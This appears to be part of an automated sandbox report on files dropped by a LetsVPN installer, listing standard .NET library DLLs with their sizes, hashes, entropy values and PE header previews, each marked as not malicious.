                                                                                                                                                                                                  MD5:AB085119653ACB754C41844348FE3F5F
                                                                                                                                                                                                  SHA1:0118CBCF925712558061C5E9E271C794B5533B6A
                                                                                                                                                                                                  SHA-256:C02843ABE60064456389B7F9727661DCFE02523B5161A4DA8963B400471961C9
                                                                                                                                                                                                  SHA-512:6A615675953BCC9DB39B77EF4D8E44E3E215A4F986678F997AD17615B4D7CFBE1F2167371DE04E77278129D8C25B6C327E9F928B4F1F329A531F4C52750C8D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............)... ...@....... ..............................v.....@.................................>)..O....@.................. ....`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................r)......H.......p .......................(........................................(....*..(....*..(....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings....`.......#US.h.......#GUID...x...(...#Blob...........G..........3.............................................."...........C...........u...............m.b...........J.....J.....J.....J...6.J...O.J.....J.....J...j.C...S.J.............................P ............X ............` ......4.....h ....................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.972496245661368
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XLH9W5nOWihqWOHlLf2KQcvBZ9c9TyS+ShjmM6IGBkS9f08:XL4Gq3b2KZBZQyS+ST6nk+f08
                                                                                                                                                                                                  MD5:3C3E85085D12983A32AD6C6A2CA91BBA
                                                                                                                                                                                                  SHA1:378F899018CEB4B24F22BCF0E9BD2AE0324C45CD
                                                                                                                                                                                                  SHA-256:03EFEB3214F6D2811BABD2A6DFCF6B512B0CC9D1E11FFB24ABB88E5866DD4F64
                                                                                                                                                                                                  SHA-512:6CE6250595400D5CDAE6ADCE03E43C8ADDF4AE65F33AE7EDB94094301D5498EF0C9453B00850A8D23A8462E199FCFC10A450D2B4A29F4C10BBC311407ECD4158
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y............" ..0..............)... ...@....... ....................................`..................................(..O....@..p............... ....`.......'..T............................................ ............... ..H............text...$.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..D.......#Strings............#US.........#GUID.......$...#Blob......................3................................................*.0.....0...g.....P...........M...........c.......................J.....{.....~.......+...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.8...+.N...3.d...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.876963437900696
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:2lbWvX+W2hqWOHlLf2KQcvBZ9mVS+ShjmM6IGBkSD:22iq3b2KZBZaS+ST6nkM
                                                                                                                                                                                                  MD5:A3C1273F2145FB8D93DECB44CE19B403
                                                                                                                                                                                                  SHA1:E9733AFA79116C1BC21C280FD84A98599D43543F
                                                                                                                                                                                                  SHA-256:45D4AC5C94A5CF78D2E4ED795767550407C4E3ED2C9E481E0DBBA71DAF331D41
                                                                                                                                                                                                  SHA-512:259BC3A26D1E20EE16D10E3BAF563B4DC0C24F4525AB786C70FB3DC9EFC7042F9177A24836DDE2A3D5E45715CD2FA7FAC8B97DAA49DE5C33C6E72908C4F19B50
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............,... ...@....... ...............................p....`.................................L,..O....@..`............... ....`......\+..T............................................ ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...8...#~..........#Strings....T.......#US.X.......#GUID...h...$...#Blob......................3................................................}.t.....t.....a........._.......................B.................................................[.....[.....[...).[...1.[...9.[...A.[...I.[...Q.[...Y.[...a.[...i.[...q.[.......................#.....+.....+.6...+.L...3.b...;.}...C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.89250295264903
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:c2mtX7WWRvWWchqWOHlLf2KQcvBZ9bYD5RkS+ShjmM6IGBkS+fk:c28XdMq3b2KZBZVkkS+ST6nkpfk
                                                                                                                                                                                                  MD5:972D2CD78F6CF7267CB7BB5FB90CEF7E
                                                                                                                                                                                                  SHA1:16FA79E77AD04062E741887F2C20886E08498D51
                                                                                                                                                                                                  SHA-256:81C839BB8194AF5342D84F0CDF0CD30A37AE391B2B0F871C206BD20CA22FDDDA
                                                                                                                                                                                                  SHA-512:C85D368805D0D2C7409A249D4F7253A7CB75C05F2AF8C49479F375C2AEA4F38EDC0FFE0D4D2E9B21AAEAA94A7D4ED8A42C0A121B7BCF74DC3F26CE70879E7ED6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>c..........." ..0............."*... ...@....... ..............................K.....`..................................)..O....@..p............... ....`.......(..T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................\(......................................BSJB............v4.0.30319......l... ...#~......H...#Strings............#US.........#GUID.......$...#Blob......................3..................................................4...q.4...E.!...T...........+.....X.....'...........p.................Y.....B...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.8...+.N...3.d...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24096
                                                                                                                                                                                                  Entropy (8bit):6.538265849347418
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:p8h2IgODoeNlPSCqWvVEWJlhqWOHlLf2KQcvBZ9S1GS+ShjmM6IGBkSLE:6z1zNlFBvLq3b2KZBZwGS+ST6nkv
                                                                                                                                                                                                  MD5:9C025374184B9455320FA76092C9E5AF
                                                                                                                                                                                                  SHA1:3DA46D5C933E60CFD117B7EA37014D6D79A0C227
                                                                                                                                                                                                  SHA-256:35457DFAD21D597170CDD44BA7B80618CDF15E3D8F30DD417D6AA8A8A06B15C6
                                                                                                                                                                                                  SHA-512:12D92DB376BB8F1F50034855C51D0D9DF8B4483F3F2CD80CF6B18373A53269C020AA36D897AE4FC30563B0299018DB0E1BFAAB16AAA48409C0536B23D5002417
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........D... ...`....... ..............................`b....`.................................xD..O....`...............0.. ...........|C..T............................................ ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc..............................@..B.................D......H.......P ..."...................B......................................BSJB............v4.0.30319......l.......#~..,...D...#Strings....p ......#US.t ......#GUID.... ..(...#Blob......................3......................................I...............\...................t.....t...C.t.....t...\.t.....t...6.t.....t.....t.....l.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+. ...+.<...+.R...3.h...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.920981860705336
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CLkW1JgWBhqWOHlLf2KQcvBZ9jDU4S+ShjmM6IGBkSlxxl:CVJq3b2KZBZK4S+ST6nkAxl
                                                                                                                                                                                                  MD5:F80FEE9B7D237CC74781BE1FA407C84F
                                                                                                                                                                                                  SHA1:F25C6840EF0A9474A049A4720F18B3F3D35825F4
                                                                                                                                                                                                  SHA-256:945C8142C6DCE8DF9B3CA23EA98D46045051C4FA513329EED22C4B3806A4B4EC
                                                                                                                                                                                                  SHA-512:3ED8D958C78B6452BE1E104E4655B9B8CBF43C6B8DD2E08CD1C75FE4FDCAA950521E9538EFC7316A022AF223B00AD88F4134DEA6B4D22E051D8BFF87C636655C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1..........." ..0.............V-... ...@....... ..............................^.....`..................................-..O....@.................. ....`.......,..T............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8-......H.......P ..<....................+......................................BSJB............v4.0.30319......l...<...#~......X...#Strings............#US.........#GUID.......(...#Blob......................3................................................:.............................w...........s.......................Z.............%.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.:...+.P...3.f...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20000
                                                                                                                                                                                                  Entropy (8bit):6.829709317092374
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iISW5NW2eWhhqWOHlLf2KQcvBZ9qfAzhaS+ShjmM6IGBkS5M:i+5bPq3b2KZBZB8S+ST6nkF
                                                                                                                                                                                                  MD5:A3AFDF77AF6A68CDEF15B468470622A3
                                                                                                                                                                                                  SHA1:C7F9B758569CF66D77A201B3E9D8F1FDE7640103
                                                                                                                                                                                                  SHA-256:72DAC6728F516A6B909A6CEBE7838D6493F63A3FCDADE001AC32A77D32876C1B
                                                                                                                                                                                                  SHA-512:D453817F6198A302FECD8736CE4C1B3D9CF59BDCE484FDFE91860D8BEB8A8EAA50FF401BCB9D5F7F2EB9E06ED521AD4C22CD7E102C0D2EBB90BD6DCCCAB36467
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............4... ...@....... ..............................<O....`................................./4..O....@............... .. ....`......83..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................c4......H........ ...............0.. ....2......................................:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*BSJB............v4.0.30319......l.......#~..........#Strings....\.......#US.`.......#GUID...p.......#Blob...........W..........3........................................................".........................q.......................B...................q...........q...X.q...'.q.....q...K.q...h.q.....q.....q...............%.....y.......{.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22048
                                                                                                                                                                                                  Entropy (8bit):6.804006840038962
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ChO4YkTdk8VKWCWV1upaW4hqWOHlLf2KQcvBZ9eMKQAS+ShjmM6IGBkSe:ChOSQ6q3b2KZBZuQAS+ST6nkR
                                                                                                                                                                                                  MD5:76DAF9C183DCC2B6BC7D4376DE0F21D6
                                                                                                                                                                                                  SHA1:0BEE15FE2B57C824A9A4AD663650A15E74CEA05C
                                                                                                                                                                                                  SHA-256:AE21471D5490904DD73A086B6E59A489230756F9560E07871721B6E5AC7D0F53
                                                                                                                                                                                                  SHA-512:800371B0724081D406A560F44E02D9636E5FF0DA9C32061C388545E2CB92B68576E912C6D90F4176286559F1B8EE11167B270166682BA229843D5356C7DAE80D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............" ..0.............*;... ...@....... .............................../....`..................................:..O....@...............(.. ....`.......9..T............................................ ............... ..H............text...0.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................;......H........!...............7..0...H9......................................:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*BSJB............v4.0.30319......l...4...#~......T...#Strings............#US.........#GUID...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.CodePages.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):764448
                                                                                                                                                                                                  Entropy (8bit):7.47717615350681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:SILs7xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPq7:jG9km6k/IwRYbiBeKGCz7
                                                                                                                                                                                                  MD5:8A309D9D04F95D704D1B3B9DE0CB3F40
                                                                                                                                                                                                  SHA1:239B41D00B0E3F694D5E8D44594A69ADD9E40AD6
                                                                                                                                                                                                  SHA-256:4CCB06D83139AFECF2676E354404BCB5B08E813678E88AFBBC416F897A83C4BC
                                                                                                                                                                                                  SHA-512:2C240259B33BD1E38F696F13E6B57C87F9656AF70973C83EF2A3153B3D05033212CF8F87CAF23DCDB71ADE5F4775900EEB27A2606D879CA1E1B79CDDCF2F05A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....mo..........." ..0..p..........n^... ........... ....................................`..................................^..O....................|.. ............]..T............................................ ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............z..............@..B................M^......H.......H....$..........<...`....\........................................(....*^.(.......5...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*..............!....0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....( ...*..(!...*.*.(....,.r...p......%...%...(....*...("...*.(...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.977283829370365
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6b1nWCXWThqWOHlLf2KQcvBZ9cWS+ShjmM6IGBkSNzw:E70q3b2KZBZrS+ST6nkN
                                                                                                                                                                                                  MD5:23EBB78F471F77A02CA547D47DAC28E9
                                                                                                                                                                                                  SHA1:46077E24AEF1939A27130CD83B645799685165D2
                                                                                                                                                                                                  SHA-256:647675A1BBB73058745FD67A25DF60FF300FD47421A4806D12A8C1DB5C7521BD
                                                                                                                                                                                                  SHA-512:CEF961FFB116A405B457B12E3FAD689AB80E41160F293631B4B9146F6B4F8A0E15DBDF58DCBCA94638DA6FF97C3FB3359FCE92D3D0FDEEE81FB314C9411780EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................Oj....@..................................(..O....@..T............... ....`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~.. ...t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....6.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.887674507025203
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:W9yW7TWjhqWOHlLf2KQcvBZ9yN4S+ShjmM6IGBkSJTo:ofYq3b2KZBZpS+ST6nkko
                                                                                                                                                                                                  MD5:EE18D84D95C0F1535EA84126F1CEBC56
                                                                                                                                                                                                  SHA1:EFB937BE1FBBB7149F49C3BB3860A511BC789072
                                                                                                                                                                                                  SHA-256:C659E7D9EF2F3E72FF750CDBF5792D327F012782C3F888449546558C352E8925
                                                                                                                                                                                                  SHA-512:1DECAD4D100507A1878C254A83CEDBA000493DF972A4CDB1D955FFA4E1EC31485DAB0AC842F12185E9169A85A86301FCF18D61A175B43C2400B3024C384DACEB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............2*... ...@....... ...............................B....@..................................)..O....@.................. ....`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...0...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.7.....7.....7...C.7.....7.....7...[.7...x.7...-.0.....7.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.012009934217988
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:06Rb32WVzWFhqWOHlLf2KQcvBZ9VBcuS+ShjmM6IGBkSvU:DRb3daq3b2KZBZrdS+ST6nkEU
                                                                                                                                                                                                  MD5:87470FF818547DFB3CF7813EB07C9617
                                                                                                                                                                                                  SHA1:555FA45A05C9E803617EA872BE534E65009B3504
                                                                                                                                                                                                  SHA-256:6F6CE08335FA5FA55278C254FCE2D4DC611531AA53F7DE574991BBAD7888F28E
                                                                                                                                                                                                  SHA-512:3E941B496B0635AC719052CC0ED4B2A0B941D30E50261E46D53CEAA3F120970655EACD6DE7C63460CBB9F4B603EEAE9B3EF251C32ACE5668FF37BF4282CEAC93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................#.....@.................................t)..O....@..P............... ....`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................K...d.K...8.8...k.....L.................K.................c...........5.........................2.....2.....2...).2...1.2...9.2...A.2...I.2...Q.2...Y.2...a.2...i.2...q.2.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32800
                                                                                                                                                                                                  Entropy (8bit):6.421442296570712
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:7MWavA+YHfsZtaOq3b2KZBZcNmS+ST6nk0:7CvA+YEuB3qKD/mC
                                                                                                                                                                                                  MD5:D6DB8C4DD199D5EA11638B21B2DA3516
                                                                                                                                                                                                  SHA1:D1853A51FEF8536FBE2B01BB84053E058FDAED04
                                                                                                                                                                                                  SHA-256:D6A7F97C2E73061FE74C5F890984C8F58653FE68BE3BEEF507F6530DE2896309
                                                                                                                                                                                                  SHA-512:956C15A5FCC5B746D18FABADFE1BFDBF40509BF617C18CF7A4AC47A7739E6FC56F115450871B8C4C5DC999FF9B816241C1E3F49F366358ACABC632C8AEB0AF90
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..D..........zb... ........... ..............................|{....`.................................%b..O.......l............R.. ...........(a..T............................................ ............... ..H............text....B... ...D.................. ..`.rsrc...l............F..............@..@.reloc...............P..............@..B................Yb......H........%..$-...........R.......`........................................(....*^.(.......*...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...( ...*.(...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33312
                                                                                                                                                                                                  Entropy (8bit):6.627433940507071
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:nu5I+sqOylryry8qqIfUc7a5Fq3b2KZBZ1S+ST6nkv7:nYIVBpry8qqIfUcm5A3qKX/mx7
                                                                                                                                                                                                  MD5:500D590818EEB1D5F425F37A29B4DD6F
                                                                                                                                                                                                  SHA1:C97012B1C9E7BB5E1C4DB172828535986B9B5800
                                                                                                                                                                                                  SHA-256:F5B75FE483F7AE77438E8E5158E7ED5BBCD16BA2787AA92FE69596C0205BA836
                                                                                                                                                                                                  SHA-512:BA1C02BAA82BCCB1A391156E0B2070CEF76E4DD3B35C30BB5060C9320574ECE35F11FE19B077E24287B6AC53BFDE59F858D4D64CCA2CEB4AD5F05E2493EF2229
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..F...........d... ........... ...................................@..................................c..O.......x............T.. ............c............................................... ............... ..H............text....D... ...F.................. ..`.rsrc...x............H..............@..@.reloc...............R..............@..B.................c......H........&...7...........^.......b......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rK..p.(....*2ry..p.(....*2r...p.(....*2r...p.(....*2rc..p.(....*......(....*..0..;........|....(......./......(....o....s

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28704
                                                                                                                                                                                                  Entropy (8bit):6.595812815283715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:MRZ4nNxnYTb6Blh9q3b2KZBZiiS+ST6nkb:PYTb6vho3qKb/mh
                                                                                                                                                                                                  MD5:8E14D9F0BF87605E6535D68B0FD8C56B
                                                                                                                                                                                                  SHA1:A9D03FC849BEDD0C91A891E26B670A408D446D6E
                                                                                                                                                                                                  SHA-256:C7B3C34060A40BBE58CE03D4B296556B7186D08FE9A99E27D4A15951CF2CF80C
                                                                                                                                                                                                  SHA-512:4178EDB29B147D35A4F826B19EF220FC8EAE704BB3D1354058A41E775CB517B5576D7793C8BD6DA07C986EA2E2464844AF7BC95E3659661901F35BD437649BC5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..8...........V... ...`....... ...................................@..................................V..O....`...............B.. ...........PU............................................... ............... ..H............text....6... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H........0...$...................T........................................(....*..(....z..(....z2.(....s....*2.(....s....*:........o....*.~....*~.-..(......}......}......}....*~.-..(......}......}......}....*Z..}......}......}....*J.{....%-.&.*o....*^.u....,........(....*.*~.{.....{....3..{.....{......*.*&...(....*2...(.......*....0..'........{......,..u....%-.&..(...+(....*(....*n.{....,..(....s....*.q....*..0..a.........{....o0.....,;..{....o2...(......;...3.~.......s......

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.97531319551383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Fvn4HREpWiQWjhqWOHlLf2KQcvBZ9fbS+ShjmM6IGBkSj:qSHq3b2KZBZlS+ST6nkI
                                                                                                                                                                                                  MD5:BB76B6B59F9B91669E4E620BCFBF45E0
                                                                                                                                                                                                  SHA1:4B251EBC28FE4C9257080EFC7B4146F7F2025230
                                                                                                                                                                                                  SHA-256:71E214159B5342A03F6343C4ECA5623C6948455BA2F509720BFDE70D804B35C7
                                                                                                                                                                                                  SHA-512:9255352F3A3FE4A63DC05D191F604E47D7C2681CFAE90CC412937EB9D47ACA79E3C32DD6B491F2FB4E1391A452E7D9C5D3317E63A4C1B6460E532FA96FC488AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
